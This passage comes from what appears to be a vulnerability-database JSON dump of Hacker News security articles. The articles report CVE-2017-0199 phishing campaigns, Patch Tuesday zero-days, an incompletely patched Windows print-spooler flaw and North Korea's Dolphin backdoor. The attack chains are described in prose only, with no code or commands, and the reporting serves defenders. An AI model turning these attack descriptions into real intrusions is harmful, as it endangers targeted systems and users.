Attacks by CopyKittens Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-07-25T15:18:34", "id": "THN:AE8CC4929BA80C03ABF4AA5FAB5465CC", "href": "https://thehackernews.com/2017/07/opykittens-cyber-espionage.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:57", "description": "[![powerpoint-remote-code-execution](https://2.bp.blogspot.com/-AOf9Y9cvTo8/WZHsw5LQeWI/AAAAAAAAuE0/IisR_kyLScs1_QmJ7j1xsRT5kur9MLT0gCLcBGAs/s1600/powerpoint-remote-code-execution.png)](<https://2.bp.blogspot.com/-AOf9Y9cvTo8/WZHsw5LQeWI/AAAAAAAAuE0/IisR_kyLScs1_QmJ7j1xsRT5kur9MLT0gCLcBGAs/s1600/powerpoint-remote-code-execution.png>)\n\nA few months back we reported how opening a simple MS Word file could compromise your computer using a critical [vulnerability in Microsoft Office](<https://thehackernews.com/2017/04/microsoft-word-zero-day.html>). \n \nThe Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface for which a [patch was issued](<https://thehackernews.com/2017/04/microsoft-patch-tuesday.html>) in April this year, but threat actors are still abusing the flaw through the different mediums. \n \nSecurity researchers have spotted a new malware campaign that is leveraging the same exploit, but for the first time, hidden behind a specially crafted PowerPoint (PPSX) Presentation file. \n \nAccording to the researchers at Trend Micro, who [spotted](<http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-0199-new-malware-abuses-powerpoint-slide-show/>) the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry. \n \nResearchers believe this attack involves the use of a sender address disguised as a legitimate email sent by a sales and billing department. \n\n\n### \nHere's How the Attack Works:\n\n \nThe complete attack scenario is listed below: \n\n\n[![phishing-email-ppt-malware](https://3.bp.blogspot.com/-QR4ex6QlDFA/WZHqqKeFUJI/AAAAAAAAuEk/wDJfqKVMYtYgyzwF-RD8muiFUEf-dxPdACLcBGAs/s1600/phishing-email-ppt-malware.png)](<https://3.bp.blogspot.com/-QR4ex6QlDFA/WZHqqKeFUJI/AAAAAAAAuEk/wDJfqKVMYtYgyzwF-RD8muiFUEf-dxPdACLcBGAs/s1600/phishing-email-ppt-malware.png>)\n\n**Step 1: **The attack begins with an email that contains a malicious PowerPoint (PPSX) file in the attachment, pretending to be shipping information about an order request. \n \n**Step 2: **Once executed, the PPSX file calls an XML file programmed in it to download \"logo.doc\" file from a remote location and runs it via the PowerPoint Show animations feature. \n \n**Step 3:** The malformed Logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system. \n \n**Step 4:** RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely. \n\n\n[![remcos-remote-control-tool](https://1.bp.blogspot.com/-FZfbaK4SLmM/WZHq-Gl7TRI/AAAAAAAAuEo/nexw08edXkkBZjepWudAACPJl_sminvdwCLcBGAs/s1600/remcos-remote-control-tool.png)](<https://1.bp.blogspot.com/-FZfbaK4SLmM/WZHq-Gl7TRI/AAAAAAAAuEo/nexw08edXkkBZjepWudAACPJl_sminvdwCLcBGAs/s1600/remcos-remote-control-tool.png>)\n\nRemcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world with some capabilities, like a download and execute the command, a keylogger, a screen logger, and recorders for both webcam and microphone. \n \nSince the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focuses on the RTF. So, the use of a new PPSX files allows attackers to evade antivirus detection as well. \n \nThe easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability.\n", "cvss3": {}, "published": "2017-08-14T07:44:00", "type": "thn", "title": "How Just Opening A Malicious PowerPoint File Could Compromise Your PC", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199"], "modified": "2017-08-14T18:45:15", "id": "THN:F91523FE89728E4535456872C0532560", "href": "https://thehackernews.com/2017/08/powerpoint-malware-ms-office.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-10-01T06:04:28", "description": "[![Cobalt Strike Beacons](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjzPTo_R5-nZkdCfRKQSaQ3NNhBj1qBqTSEio4OjQhW9a8OT8OieVQbaYEsPoI53O4RzDxtv_7M5siLdnDwz4n-z-5YZprnr8ncJI1O7nT9VcHV5dTM2jJ8DsCgeZ9UcD14r3-EOow9tz6jLwD1FnEnXBOe411dcot4rmIS5W_9_iRHtovd9AB1JyU3/s728-e1000/hacked.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjzPTo_R5-nZkdCfRKQSaQ3NNhBj1qBqTSEio4OjQhW9a8OT8OieVQbaYEsPoI53O4RzDxtv_7M5siLdnDwz4n-z-5YZprnr8ncJI1O7nT9VcHV5dTM2jJ8DsCgeZ9UcD14r3-EOow9tz6jLwD1FnEnXBOe411dcot4rmIS5W_9_iRHtovd9AB1JyU3/s728-e100/hacked.jpg>)\n\nA social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts.\n\n\"The payload discovered is a leaked version of a Cobalt Strike beacon,\" Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer [said](<https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html>) in a new analysis published Wednesday.\n\n\"The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, exhibiting the redirection technique to masquerade the beacon's traffic.\"\n\nThe malicious activity, discovered in August 2022, attempts to exploit the vulnerability [CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>), a remote code execution issue in Microsoft Office, that allows an attacker to take control of an affected system.\n\nThe entry vector for the attack is a phishing email containing a Microsoft Word attachment that employs job-themed lures for roles in the U.S. government and Public Service Association, a trade union based in New Zealand.\n\n[![Cobalt Strike Beacons](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdChpUPq28PFI1gxqFEL7vMnrg9hcDaSDZnHhCwAqM85WeotBYbaDlNCVXMAclQ5NF1YQ3UhWPS599-m4a-DEKC5c9pHyTcnAZHDvHq1QwDAD0CIV1-3xwXKeMWKfUwlFhh6XSmk7PfURLrOjSYF-gmU-HbOyYXBU_6wCDCGigCqgVcPFKl7nSs1ZQ/s728-e1000/attack-1.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdChpUPq28PFI1gxqFEL7vMnrg9hcDaSDZnHhCwAqM85WeotBYbaDlNCVXMAclQ5NF1YQ3UhWPS599-m4a-DEKC5c9pHyTcnAZHDvHq1QwDAD0CIV1-3xwXKeMWKfUwlFhh6XSmk7PfURLrOjSYF-gmU-HbOyYXBU_6wCDCGigCqgVcPFKl7nSs1ZQ/s728-e100/attack-1.jpg>)\n\n[![Cobalt Strike Beacons](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKTwUbbaIuB60XW2AR0_DxhD7EufUiKIMA2fFmX137nSR21WWd_X7jgyH9DR8bCWACffKqjPxWEtxjJ3wK0QDsEHbJHW_Pu-KBxrW32ObpfsvX9p9t4TGL3YHJVLOQzDsRU3W1szZ44b1g6WWtKfZIb3VTfCJ2r9mlfgrFqtVsOZS3l7dJocp5avQE/s728-e1000/attack-2.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiKTwUbbaIuB60XW2AR0_DxhD7EufUiKIMA2fFmX137nSR21WWd_X7jgyH9DR8bCWACffKqjPxWEtxjJ3wK0QDsEHbJHW_Pu-KBxrW32ObpfsvX9p9t4TGL3YHJVLOQzDsRU3W1szZ44b1g6WWtKfZIb3VTfCJ2r9mlfgrFqtVsOZS3l7dJocp5avQE/s728-e100/attack-2.jpg>)\n\nCobalt Strike beacons are far from the only malware samples deployed, for Cisco Talos said it has also observed the usage of the [Redline Stealer](<https://thehackernews.com/2022/09/researchers-warn-of-self-spreading.html>) and [Amadey botnet](<https://thehackernews.com/2022/07/smokeloader-infecting-targeted-systems.html>) executables as payloads at the other end of the attack chain.\n\nCalling the attack methodology \"highly modularized,\" the cybersecurity company said the activity also stands out for its use of Bitbucket repositories to host malicious content that serves as a starting point for downloading a Windows executable responsible for deploying the Cobalt Strike DLL beacon.\n\nIn an alternative attack sequence, the Bitbucket repository functions as a conduit to deliver obfuscated VB and PowerShell downloader scripts to install the beacon hosted on a different Bitbucket account.\n\n\"This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim's system memory,\" the researchers said.\n\n\"Organizations should be constantly vigilant on the Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker's attempts in the earlier stage of the attack's infection chain.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-30T10:20:00", "type": "thn", "title": "New Malware Campaign Targeting Job Seekers with Cobalt Strike Beacons", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2022-10-01T05:49:12", "id": "THN:D18D5B68E1C8C3E3C323D4C71C3B2375", "href": "https://thehackernews.com/2022/09/new-malware-campaign-targeting-job.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:59", "description": "[![Update Windows Systems](https://thehackernews.com/images/-Oinzu8T6SmI/YMBZ7WkhbJI/AAAAAAAACzI/kVA4Ura4Yl4MrNb_jPNPBtgjkBj1DSs1wCLcBGAsYHQ/s728-e1000/microsoft-windows-update.jpg)](<https://thehackernews.com/images/-Oinzu8T6SmI/YMBZ7WkhbJI/AAAAAAAACzI/kVA4Ura4Yl4MrNb_jPNPBtgjkBj1DSs1wCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday released another round of [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jun>) for Windows operating system and other supported software, squashing 50 vulnerabilities, including six zero-days that are said to be under active attack.\n\nThe flaws were identified and resolved in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code - Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nOf these 50 bugs, five are rated Critical, and 45 are rated Important in severity, with three of the issues publicly known at the time of release. The vulnerabilities that being actively exploited are listed below -\n\n * [**CVE-2021-33742**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) (CVSS score: 7.5) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2021-33739**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) (CVSS score: 8.4) - Microsoft DWM Core Library Elevation of Privilege Vulnerability\n * [**CVE-2021-31199**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31201**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31955**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) (CVSS score: 5.5) - Windows Kernel Information Disclosure Vulnerability\n * [**CVE-2021-31956**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) (CVSS score: 7.8) - Windows NTFS Elevation of Privilege Vulnerability\n\nMicrosoft didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them. But the fact that four of the six flaws are privilege escalation vulnerabilities suggests that attackers could be leveraging them as part of an infection chain to gain elevated permissions on the targeted systems to execute malicious code or leak sensitive information.\n\nThe Windows maker also noted that both CVE-2021-31201 and CVE-2021-31199 address flaws related to [CVE-2021-28550](<https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html>), an arbitrary code execution vulnerability rectified by Adobe last month that it said was being \"exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\"\n\nGoogle's Threat Analysis Group, which has been acknowledged as having reported CVE-2021-33742 to Microsoft, [said](<https://twitter.com/ShaneHuntley/status/1402320072123719690>) \"this seem[s] to be a commercial exploit company providing capability for limited nation state Eastern Europe / Middle East targeting.\"\n\nRussian cybersecurity firm Kaspersky, for its part, detailed that CVE-2021-31955 and CVE-2021-31956 were abused in a Chrome zero-day exploit chain ([CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>)) in a series of highly targeted attacks against multiple companies on April 14 and 15. The intrusions were attributed to a new threat actor dubbed \"PuzzleMaker.\"\n\n\"While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges,\" Kaspersky Lab researchers [said](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nElsewhere, Microsoft fixed numerous remote code execution vulnerabilities spanning Paint 3D, Microsoft SharePoint Server, Microsoft Outlook, Microsoft Office Graphics, Microsoft Intune Management Extension, Microsoft Excel, and Microsoft Defender, as well as several privilege escalation flaws in Microsoft Edge, Windows Filter Manager, Windows Kernel, Windows Kernel-Mode Driver, Windows NTLM Elevation, and Windows Print Spooler.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, a number of other vendors have also released a slew of patches on Tuesday, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-06-01>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Intel](<https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-June/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) (with cybersecurity firm Onapsis [credited](<https://onapsis.com/blog/sap-security-patch-day-june-2021-multiple-memory-corruption-vulnerabilities-can-lead-system>) with identifying 20 of the 40 remediated flaws)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-09T06:07:00", "type": "thn", "title": "Update Your Windows Computers to Patch 6 New In-the-Wild Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T16:52:54", "id": "THN:1DDE95EA33D4D9F304973569FC787451", "href": "https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:39", "description": "[![](https://thehackernews.com/images/-WK9xrOIlPVc/X-RYcAJN2cI/AAAAAAAABV4/SYDr63wXxioAhyy_OmTToTSb2-lArPb5ACLcBGAsYHQ/s0/windows.jpg)](<https://thehackernews.com/images/-WK9xrOIlPVc/X-RYcAJN2cI/AAAAAAAABV4/SYDr63wXxioAhyy_OmTToTSb2-lArPb5ACLcBGAsYHQ/s0/windows.jpg>)\n\nGoogle's Project Zero team has made public details of an improperly patched zero-day security vulnerability in Windows print spooler API that could be leveraged by a bad actor to execute arbitrary code.\n\nDetails of the unpatched flaw were revealed publicly after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOriginally tracked as [CVE-2020-0986](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0986.html>), the flaw concerns an elevation of privilege exploit in the GDI Print / [Print Spooler](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-printing>) API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative (ZDI) back in late December 2019.\n\nBut with no patch in sight for about six months, ZDI ended up posting a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) as a zero-day on May 19 earlier this year, after which it was [exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) in the wild in a campaign dubbed \"[Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>)\" against an unnamed South Korean company.\n\n\"splwow64.exe\" is a Windows core system binary that allows 32-bit applications to connect with the 64-bit printer spooler service on 64-bit Windows systems. It implements a Local Procedure Call ([LPC](<https://en.wikipedia.org/wiki/Local_Inter-Process_Communication>)) server that can be used by other processes to access printing functions.\n\n[![](https://thehackernews.com/images/-2-ux57hW8ck/X-RaBqZDyzI/AAAAAAAA3fU/tAWWkpJ90zwym1bZ24XlJIKgzoOu537kgCLcBGAsYHQ/s0/tweet.jpg)](<https://thehackernews.com/images/-2-ux57hW8ck/X-RaBqZDyzI/AAAAAAAA3fU/tAWWkpJ90zwym1bZ24XlJIKgzoOu537kgCLcBGAsYHQ/s0/tweet.jpg>)\n\nSuccessful exploitation of this vulnerability could result in an attacker manipulating the memory of the \"splwow64.exe\" process to achieve execution of arbitrary code in kernel mode, ultimately using it to install malicious programs; view, change, or delete data; or create new accounts with full user rights.\n\nHowever, to achieve this, the adversary would first have to log on to the target system in question.\n\nAlthough Microsoft eventually [addressed](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) the shortcoming as part of its June Patch Tuesday update, new findings from Google's security team reveals that the flaw has not been fully remediated.\n\n\"The vulnerability still exists, just the exploitation method had to change,\" Google Project Zero researcher Maddie Stone [said](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) in a write-up.\n\n\"The original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy,\" Stone [detailed](<https://twitter.com/maddiestone/status/1341781305126612995>). \"The 'fix' simply changed the pointers to offsets, which still allows control of the args to the memcpy.\"\n\nThe newly reported elevation of privilege flaw, identified as CVE-2020-17008, is expected to be resolved by Microsoft on January 12, 2021, due to \"issues identified in testing\" after promising an initial fix in November.\n\nStone has also shared a proof-of-concept (PoC) exploit code for CVE-2020-17008, based off of a PoC released by Kaspersky for CVE-2020-0986\n\n\"There have been too many occurrences this year of zero-days known to be actively exploited being fixed incorrectly or incompletely,\" Stone [said](<https://twitter.com/maddiestone/status/1341781305126612995>). \"When [in the wild] zero-days aren't fixed completely, attackers can reuse their knowledge of vulnerabilities and exploit methods to easily develop new zero-days.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-24T09:01:00", "type": "thn", "title": "Google Discloses Poorly-Patched, Now Unpatched, Windows 0-Day Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "modified": "2020-12-28T06:17:30", "id": "THN:279CDD851D8F33C8B07217F8D20F6AAA", "href": "https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-01T10:08:46", "description": "[![North Korea Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEguuDZ3qs5lgaYGEPnkSvUwvjWoNLjrTPyh6zE6rNWPcfcoi3sbiwfWOE2OLG0ZgwzBaMEgd3nhemOfZBAjXWZrvTA_2pQuFLY_ZXqKZSxQPLxDkah_q7LPIPUgatzeBpkofWujSyJFMviobYflgfFhDwuA5mkETfxo_1c2RwXl7Xqhm__-JyX2Qv5f/s728-e1000/north-korean-hackers.png)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEguuDZ3qs5lgaYGEPnkSvUwvjWoNLjrTPyh6zE6rNWPcfcoi3sbiwfWOE2OLG0ZgwzBaMEgd3nhemOfZBAjXWZrvTA_2pQuFLY_ZXqKZSxQPLxDkah_q7LPIPUgatzeBpkofWujSyJFMviobYflgfFhDwuA5mkETfxo_1c2RwXl7Xqhm__-JyX2Qv5f/s728-e100/north-korean-hackers.png>)\n\nThe North Korea-linked **ScarCruft** group has been attributed to a previously undocumented backdoor called **Dolphin** that the threat actor has used against targets located in its southern counterpart.\n\n\"The backdoor [...] has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers,\" ESET researcher Filip Jur\u010dacko [said](<https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/>) in a new report published today.\n\nDolphin is said to be selectively deployed, with the malware using cloud services like Google Drive for data exfiltration as well as command-and-control.\n\nThe Slovak cybersecurity company said it found the implant deployed as a final-stage payload as part of a watering hole attack in early 2021 directed against a South Korean digital newspaper.\n\nThe campaign, first uncovered by [Kaspersky](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [Volexity](<https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html>) last year, [entailed](<https://thehackernews.com/2021/11/new-chinotto-spyware-targets-north.html>) the weaponization of two Internet Explorer flaws ([CVE-2020-1380](<https://nvd.nist.gov/vuln/detail/CVE-2020-1380>) and [CVE-2021-26411](<https://nvd.nist.gov/vuln/detail/CVE-2021-26411>)) to drop a backdoor named BLUELIGHT.\n\nScarCruft, also called APT37, InkySquid, Reaper, and Ricochet Chollima, is a geo-political motivated APT group that has a track record of attacking government entities, diplomats, and news organizations associated with North Korean affairs. It's been known to be active since at least 2012.\n\n[![North Korea Hackers](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhItcVkM0m5zhqX10j4Fv2rPPP2We8o6mht_lw30dkUTqLNwYuZHBoHN0gjkkpvBqmX1HKaPOPG66yONSngGcbyPcS1fuUejlqggkNCggwrwmUu5IqQAAmE-8oXLWjigA1mb6AZoRm0XvLdfO8e24VTID9ZToUk_vqWUAesZVlXaXLpGkMKksGL2xEJ/s728-e1000/hacker.png)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhItcVkM0m5zhqX10j4Fv2rPPP2We8o6mht_lw30dkUTqLNwYuZHBoHN0gjkkpvBqmX1HKaPOPG66yONSngGcbyPcS1fuUejlqggkNCggwrwmUu5IqQAAmE-8oXLWjigA1mb6AZoRm0XvLdfO8e24VTID9ZToUk_vqWUAesZVlXaXLpGkMKksGL2xEJ/s728-e100/hacker.png>)\n\nEarlier this April, cybersecurity firm Stairwell [disclosed](<https://thehackernews.com/2022/04/north-korean-hackers-target-journalists.html>) details of a spear-phishing attack targeting journalists covering the country with the ultimate goal of deploying a malware dubbed GOLDBACKDOOR that shares tactical overlaps with BLUELIGHT.\n\nThe latest findings from ESET shed light on a second, more sophisticated backdoor delivered to a small pool of victims via BLUELIGHT, indicative of a highly-targeted espionage operation.\n\nThis, in turn, is achieved by executing an installer shellcode that activates a loader comprising a Python and shellcode component, the latter of which runs another shellcode loader to drop the backdoor.\n\n\"While the BLUELIGHT backdoor performs basic reconnaissance and evaluation of the compromised machine after exploitation, Dolphin is more sophisticated and manually deployed only against selected victims,\" Jur\u010dacko explained.\n\nWhat makes Dolphin a lot more potent than BLUELIGHT is its ability to search removable devices and connected smartphones, and exfiltrate files of interest, such as media, documents, emails, and certificates.\n\nThe backdoor, since its original discovery in April 2021, is said to have undergone three successive iterations that come with its own set of feature improvements and grant it more detection evasion capabilities.\n\n\"Dolphin is another addition to ScarCruft's extensive arsenal of backdoors abusing cloud storage services,\" Jur\u010dacko said. \"One unusual capability found in prior versions of the backdoor is the ability to modify the settings of victims' Google and Gmail accounts to lower their security, presumably in order to maintain account access for the threat actors.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-30T18:30:00", "type": "thn", "title": "North Korea Hackers Using New \"Dolphin\" Backdoor to Spy on South Korean Targets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2022-12-01T09:22:08", "id": "THN:27562A9FDA5CEBF33FAC792C73F4B06E", "href": "https://thehackernews.com/2022/12/north-korea-hackers-using-new-dolphin.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:13", "description": 